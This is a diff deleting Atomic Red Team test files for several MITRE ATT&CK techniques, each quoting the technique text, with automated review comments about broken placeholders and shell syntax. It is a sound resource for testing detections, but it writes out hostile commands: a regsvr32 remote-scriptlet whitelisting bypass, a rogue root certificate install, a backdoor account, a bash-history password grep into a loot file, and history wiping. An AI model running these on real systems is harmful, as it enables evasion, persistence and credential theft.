@@ -1,87 +0,0 @@
|
||||
# T1117 - Regsvr32
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1117)
|
||||
<blockquote>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)
|
||||
|
||||
Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.
|
||||
|
||||
Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
|
||||
|
||||
Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)
|
||||
|
||||
Detection: Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)
|
||||
|
||||
Platforms: Windows
|
||||
|
||||
Data Sources: Loaded DLLs, Process monitoring, Process command-line parameters, Windows Registry
|
||||
|
||||
Defense Bypassed: Process whitelisting, Anti-virus
|
||||
|
||||
Permissions Required: User, Administrator
|
||||
|
||||
Remote Support: No
|
||||
|
||||
Contributors: Casey Smith</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Regsvr32 local COM scriptlet execution](#atomic-test-1---regsvr32-local-com-scriptlet-execution)
|
||||
|
||||
- [Atomic Test #2 - Regsvr32 remote COM scriptlet execution](#atomic-test-2---regsvr32-remote-com-scriptlet-execution)
|
||||
|
||||
- [Atomic Test #3 - Regsvr32 local DLL execution](#atomic-test-3---regsvr32-local-dll-execution)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Regsvr32 local COM scriptlet execution
|
||||
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| filename | Name of the local file, include path. | Path | Regsvr32.sct|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
regsvr32.exe /s /u /i:#(unknown) scrobj.dll
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution
|
||||
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| url | URL to hosted sct file | Url | http://www.example.com/file.sct|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
regsvr32.exe /s /u /i:#{url} scrobj.dll
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Regsvr32 local DLL execution
|
||||
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | payload.dll|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
regsvr32.exe #{dll_name}
|
||||
```
|
||||
<br/>
|
||||
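Review bot: Atomic Test #1 has lost its input placeholder: the command reads `regsvr32.exe /s /u /i:#(unknown) scrobj.dll` although the Inputs table declares `filename` (default `Regsvr32.sct`), so it should read `/i:#{filename}`, matching `/i:#{url}` in Test #2. The three test descriptions all repeat the generic Regsvr32 definition; each should say what its test does (local scriptlet, remote scriptlet, local DLL) rather than restating the heading.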
@@ -1,55 +0,0 @@
|
||||
# T1123 - Audio Capture
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1123)
|
||||
<blockquote>An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
|
||||
|
||||
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
|
||||
|
||||
Detection: Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
|
||||
|
||||
Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: API monitoring, Process monitoring, File monitoring
|
||||
|
||||
Permissions Required: User</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - SourceRecorder via Windows command prompt](#atomic-test-1---sourcerecorder-via-windows-command-prompt)
|
||||
|
||||
- [Atomic Test #2 - PowerShell Cmdlet via Windows command prompt](#atomic-test-2---powershell-cmdlet-via-windows-command-prompt)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - SourceRecorder via Windows command prompt
|
||||
Create a file called test.wma, with the duration of 30 seconds
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | Path to the recording file being captured | Path | test.wma|
|
||||
| duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - PowerShell Cmdlet via Windows command prompt
|
||||
[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
|
||||
```
|
||||
<br/>
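Review bot: the Inputs table types `duration_hms` as `Path` and defaults it to `30`, which is not the h:m:s value its own description promises (`SoundRecorder /DURATION` takes hh:mm:ss, so `00:00:30` and type `String`); the heading also spells the tool `SourceRecorder` while the command runs `SoundRecorder`, so correcting either side alone breaks the `#atomic-test-1---sourcerecorder-...` anchor in the index. In Test #2, `powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet` invokes the repository name rather than any cmdlet that module exports, so it cannot succeed as written; the file is deleted wholesale here, so carry these fixes into whatever replaces it.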
@@ -1,79 +0,0 @@
# T1127 - Trusted Developer Utilities
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1127)
<blockquote>There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.

===MSBuild===

MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations. (Citation: MSDN MSBuild)

Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file. (Citation: MSDN MSBuild) Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)

===DNX===

The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016. (Citation: Microsoft Migrating from DNX) DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft.

An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX. (Citation: engima0x3 DNX Bypass)

===RCSI===

The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution. (Citation: Microsoft Roslyn CPT RCSI) The rcsi.exe binary is signed by Microsoft. (Citation: engima0x3 RCSI Bypass)

C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe. (Citation: engima0x3 RCSI Bypass)

===WinDbg/CDB===

WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools. (Citation: Microsoft Debugging Tools for Windows) They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.

An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities. (Citation: Exploit Monday WinDbg)

It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.

===Tracker===

The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system. (Citation: Microsoft Docs File Tracking)

An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. (Citation: Twitter SubTee Tracker.exe)

Detection: The presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.

Use process monitoring to monitor the execution and arguments of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, cdb.exe, and tracker.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.

Platforms: Windows

Data Sources: Process monitoring

Defense Bypassed: Application whitelisting

Permissions Required: User

System Requirements: MSBuild: .NET Framework version 4 or higher
DNX: .NET 4.5.2, Powershell 4.0
RCSI: .NET 4.5 or later, Visual Studio 2012

Remote Support: No

Contributors: Casey Smith, Matthew Demaske, Adaptforward</blockquote>

## Atomic Tests

- [Atomic Test #1 - MSBuild Bypass Using Inline Tasks](#atomic-test-1---msbuild-bypass-using-inline-tasks)


<br/>

## Atomic Test #1 - MSBuild Bypass Using Inline Tasks
Executes the code in a project file using. C# Example

**Supported Platforms:** Windows


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | Location of the project file | Path | T1127.csproj|

#### Run it with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe T1127.csproj
```
<br/>
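Review bot: the command hardcodes `T1127.csproj` instead of substituting the `#{filename}` input declared in the Inputs table, so the test's only input has no effect; it should read `C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}`. The description "Executes the code in a project file using. C# Example" is a broken sentence, and the `.csproj` carrying the inline task is not part of this change, so a reader of the replacement file cannot tell whether the project file ships alongside it; both should be addressed when the file is re-created.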
@@ -1,61 +0,0 @@
# T1130 - Install Root Certificate
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1130)
<blockquote>Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)

In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)

Detection: A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (<code>sigcheck[64].exe -tuv</code>) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)

Installed root certificates are located in the Registry under <code>HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\</code> and <code>[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\</code>. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
*18F7C1FCC3090203FD5BAA2F861A754976C8DD25
*245C97DF7514E7CF2DF8BE72AE957B9E04741E85
*3B1EFD3A66EA28B16697394703A72CA340A05BD5
*7F88CD7223F3C813818C994614A89C99FA3B5247
*8F43288AD272F3103B6FB1428485EA3014C0BCFE
*A43489159A520F0D93D032CCAF37E7FE20A8B419
*BE36A4562FB2EE05DBB3D32323ADF445084ED656
*CDD4EEAE6000AC7F40C3802C171E30148030C072

Platforms: Linux, Windows, macOS

Data Sources: SSL/TLS inspection, Digital Certificate Logs

Defense Bypassed: Digital Certificate Validation

Permissions Required: Administrator, User

Contributors: Itzik Kotler, SafeBreach, Travis Smith, Tripwire, Red Canary, Matt Graeber, @mattifestation, SpecterOps</blockquote>

## Atomic Tests

- [Atomic Test #1 - Install root CA on CentOS/RHEL](#atomic-test-1---install-root-ca-on-centosrhel)


<br/>

## Atomic Test #1 - Install root CA on CentOS/RHEL
Creates a root CA with openssl

**Supported Platforms:** Linux


#### Run it with `sh`!
```
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}

if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ];
then
cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ];
cp rootCA.crt /etc/pki/ca-trust/source/anchors/
update-ca-trust
fi
```
<br/>
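Review bot: the shell block is not valid sh: `else if [ ... ];` has no `then` and opens a second `if` that the single `fi` never closes, so the executor fails with a syntax error before installing anything; write it as `elif [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ]; then`. The script also generates the CA into `#{key_filename}`/`#{cert_filename}` but installs `rootCA.crt`, and neither placeholder is declared (the test has no Inputs table), so the two halves never refer to the same file. Note too that a release of 6 matches neither `-le "5"` nor `-ge "7"`, so on CentOS 6 the test silently does nothing; worth stating or handling in the replacement file.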
@@ -1,58 +0,0 @@
# T1136 - Create Account
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1136)
<blockquote>Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.

The <code>net user</code> commands can be used to create a local or domain account.

Detection: Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.

Platforms: Linux, macOS, Windows

Data Sources: Process Monitoring, Process command-line parameters, Authentication logs, Windows event logs

Permissions Required: Administrator</blockquote>

## Atomic Tests

- [Atomic Test #1 - Create a user account on a Linux system](#atomic-test-1---create-a-user-account-on-a-linux-system)

- [Atomic Test #2 - Create a user account on a MacOS system](#atomic-test-2---create-a-user-account-on-a-macos-system)


<br/>

## Atomic Test #1 - Create a user account on a Linux system
Create a user via useradd

**Supported Platforms:** Linux


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | evil_user|
| comment | Comment to record when creating the user | String | Evil Account|

#### Run it with `bash`!
```
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
```
<br/>
<br/>

## Atomic Test #2 - Create a user account on a MacOS system
Creates a user on a MacOS system with dscl

**Supported Platforms:** macOS


#### Run it with `bash`!
```
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```
<br/>
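Review bot: Test #2 uses `#{username}` and `#{realname}` but declares no Inputs table, so neither placeholder is substituted and `dscl . -create /Users/#{username}` runs literally; copy the Inputs block from Test #1 and add a `realname` row in the file that replaces this one. `UniqueID "1010"` is hardcoded and will collide with an existing account on a host that already uses that UID, and the account is created with no password (`dscl ... -passwd` is never run), which is fine for a detection test but should be said in the description. Test #1 is consistent with its inputs; note only that `-r` makes a system account, which is a different artifact from the interactive user the ATT&CK text describes.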
@@ -1,37 +0,0 @@
# T1139 - Bash History
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1139)
<blockquote>Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)

Detection: Monitoring when the user's <code>.bash_history</code> is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.

Platforms: Linux, macOS

Data Sources: File monitoring, Process monitoring, Process command-line parameters

Permissions Required: User</blockquote>

## Atomic Tests

- [Atomic Test #1 - xxxx](#atomic-test-1---xxxx)


<br/>

## Atomic Test #1 - xxxx
xxxx

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bash_history_filename | Path of the bash history file to capture | Path | ~/.bash_history|
| bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|

#### Run it with `sh`!
```
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
<br/>
```
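Review bot: the test is still titled `xxxx` with description `xxxx`, placeholder text that should not be carried over verbatim into the replacement file; give it a real name (for example "Search bash history for credentials") and update the `#atomic-test-1---xxxx` index anchor to match. The `bash_history_grep_args` input is typed `Path` but holds grep expressions (`String`), its single quotes have to survive substitution for `-e '-p '` to work, and `cat file | grep ...` can simply be `grep #{bash_history_grep_args} #{bash_history_filename}`, which also keeps the file name in the process command line that the Detection paragraph says to monitor.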
@@ -1,109 +0,0 @@
# T1146 - Clear Command History
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1146)
<blockquote>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.

Detection: User authentication, especially via remote terminal services like SSH, without new entries in that user's <code>~/.bash_history</code> is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the <code>~/.bash_history</code> file are indicators of suspicious activity.

Platforms: Linux, macOS

Data Sources: Authentication logs, File monitoring

Defense Bypassed: Log analysis, Host forensic analysis

Permissions Required: User</blockquote>

## Atomic Tests

- [Atomic Test #1 - Clear Bash history (rm)](#atomic-test-1---clear-bash-history-rm)

- [Atomic Test #2 - Clear Bash history (echo)](#atomic-test-2---clear-bash-history-echo)

- [Atomic Test #3 - Clear Bash history (cat dev/null)](#atomic-test-3---clear-bash-history-cat-devnull)

- [Atomic Test #4 - Clear Bash history (ln dev/null)](#atomic-test-4---clear-bash-history-ln-devnull)

- [Atomic Test #5 - Clear Bash history (truncate)](#atomic-test-5---clear-bash-history-truncate)

- [Atomic Test #6 - Clear history of a bunch of shells](#atomic-test-6---clear-history-of-a-bunch-of-shells)


<br/>

## Atomic Test #1 - Clear Bash history (rm)
Clears bash history via rm

**Supported Platforms:** Linux, macOS


#### Run it with `sh`!
```
rm ~/.bash_history
```
<br/>
<br/>

## Atomic Test #2 - Clear Bash history (echo)
Clears bash history via rm

**Supported Platforms:** Linux, macOS


#### Run it with `sh`!
```
echo "" > ~/.bash_history
```
<br/>
<br/>

## Atomic Test #3 - Clear Bash history (cat dev/null)
Clears bash history via cat /dev/null

**Supported Platforms:** Linux, macOS


#### Run it with `sh`!
```
cat /dev/null > ~/.bash_history
```
<br/>
<br/>

## Atomic Test #4 - Clear Bash history (ln dev/null)
Clears bash history via a symlink to /dev/null

**Supported Platforms:** Linux, macOS


#### Run it with `sh`!
```
ln -sf /dev/null ~/.bash_history
```
<br/>
<br/>

## Atomic Test #5 - Clear Bash history (truncate)
Clears bash history via truncate

**Supported Platforms:** Linux


#### Run it with `sh`!
```
truncate -s0 ~/.bash_history
```
<br/>
<br/>

## Atomic Test #6 - Clear history of a bunch of shells
Clears the history of a bunch of different shell types by setting the history size to zero

**Supported Platforms:** Linux


#### Run it with `sh`!
```
unset HISTFILE
export HISTFILESIZE=0
history -c
```
<br/>
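Review bot: Test #2's description reads "Clears bash history via rm" while its command is `echo "" > ~/.bash_history`, a copy-paste from Test #1. More substantively, Test #6 runs `unset HISTFILE`, `export HISTFILESIZE=0` and `history -c` under the `sh` executor, i.e. in a child process, so it never touches the invoking user's interactive bash history (and `history` is a bash builtin that a POSIX `sh` need not provide), and the description's "a bunch of different shell types" does not match three bash-specific commands. Tests #1 to #5 clear only the on-disk file, which the still-running interactive shell rewrites from memory on exit; the replacement file should say these generate the file-system artifacts named in the Detection paragraph rather than claim a working anti-forensic bypass.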
@@ -1,38 +0,0 @@
# T1146 - Clear Command History
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1146)
<blockquote>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.

Detection: User authentication, especially via remote terminal services like SSH, without new entries in that user's <code>~/.bash_history</code> is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the <code>~/.bash_history</code> file are indicators of suspicious activity.

Platforms: Linux, macOS

Data Sources: Authentication logs, File monitoring

Defense Bypassed: Log analysis, Host forensic analysis

Permissions Required: User</blockquote>

## Atomic Tests

- [Atomic Test #1 - Disable history collection](#atomic-test-1---disable-history-collection)


<br/>

## Atomic Test #1 - Disable history collection
Disables history collection in shells

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| evil_command | Command to run after shell history collection is disabled | String | whoami|

#### Run it with `sh`!
```
export HISTCONTROL=ignoreboth
ls #{evil_command}
```
<br/>
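Review bot: `ls #{evil_command}` passes the command to `ls` as a file argument instead of executing it, so with the default `whoami` it just lists a nonexistent file; the line should be `#{evil_command}` alone. `HISTCONTROL=ignoreboth` only suppresses lines that start with a space (or repeat the previous entry), so the command would additionally need a leading space to be hidden, and exporting the variable inside the non-interactive `sh` executor affects only that child process, not the user's shell. This file also duplicates the technique header of the 109-line T1146 file deleted above; if both are being re-created, fold this test into that one rather than keeping two files for a single technique.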
@@ -1,48 +0,0 @@
# T1158 - Hidden Files and Directories
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1158)
<blockquote>To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).

===Windows===

Users can mark specific files as hidden by using the attrib.exe binary. Simply do <code>attrib +h filename</code> to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.

===Linux/Mac===

Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: <code>defaults write com.apple.finder AppleShowAllFiles YES</code>, and then relaunch the Finder Application.

===Mac===

Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).
Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.

Detection: Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.

Platforms: Linux, macOS, Windows

Data Sources: File monitoring, Process Monitoring, Process command-line parameters

Defense Bypassed: Host forensic analysis

Permissions Required: User</blockquote>

## Atomic Tests

- [Atomic Test #1 - Create a hidden file in a hidden directory](#atomic-test-1---create-a-hidden-file-in-a-hidden-directory)


<br/>

## Atomic Test #1 - Create a hidden file in a hidden directory
Creates a hidden file inside a hidden directory

**Supported Platforms:** Linux, macOS


#### Run it with `sh`!
```
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
```
<br/>
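Review bot: the only test covers the Linux/macOS dot-file case, while the description's Windows section (`attrib +h filename`) and the macOS UF_HIDDEN flag have no test at all, so Windows is listed under Platforms but never exercised; a `command_prompt` test running `attrib +h` (and a macOS one using `chflags hidden`) would match the Detection paragraph's own advice to watch for attrib.exe adding the hidden attribute. The existing test also leaves `.hidden-directory` behind with no cleanup, and creates it relative to whatever the executor's working directory happens to be.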
@@ -1,79 +0,0 @@
# T1176 - Browser Extensions
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1176)
<blockquote>Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition)

Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so may not be difficult for malicious extensions to defeat automated scanners and be uploaded. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser, to include credentials, (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control (Citation: Chrome Extension C2 Malware).

Detection: Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.

Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.

Platforms: Linux, macOS, Windows

Data Sources: Network protocol analysis, Packet capture, System calls, Process use of network, Process monitoring, Browser extensions

Permissions Required: User

Contributors: Justin Warner, ICEBRG</blockquote>

